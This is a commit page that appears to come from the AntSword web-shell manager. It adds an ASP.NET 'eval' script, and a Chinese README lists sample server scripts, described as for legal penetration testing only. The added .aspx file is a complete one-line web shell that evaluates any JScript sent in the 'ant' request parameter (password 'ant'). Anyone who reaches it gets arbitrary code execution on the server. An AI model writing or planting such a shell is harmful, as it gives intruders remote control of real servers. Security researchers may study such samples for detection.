Commit 71569db5 authored by Medicean's avatar Medicean

Add ASP.Net eval Script

parent 6ebc232e
## Shell-Scripts
> 此目录用于存放一些示例的服务端脚本文件,仅供合法的渗透测试以及爱好者参考学习,请勿用于非法用途,否则将追究其相关责任!
### ASP.Net
> .aspx .ashx
1. [ASP.Net Custom Script for ODBC](./asp.net_custom_script_for_odbc.aspx)
2. [ASP.Net eval Script](./asp.net_eval_script.aspx)
### PHP
1. [PHP Custom Script for Mysql](./php_custom_script_for_mysql.php)
......
<%--
/**
* _ ____ _
* __ _ _ __ | |_/ ___|_ _____ _ __ __| |
* / _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
* | (_| | | | | |_ ___) \ V V / (_) | | | (_| |
* \__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
* ———————————————————————————————————————————————
* AntSword ASP.Net eval Script
*
* 警告:
* 此脚本仅供合法的渗透测试以及爱好者参考学习
* 请勿用于非法用途,否则将追究其相关责任!
* ———————————————————————————————————————————————
* pwd = ant
*/
--%>
<%@ Page Language="Jscript"%>
<% eval(Request.Item["ant"],"unsafe"); %>
\ No newline at end of file
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment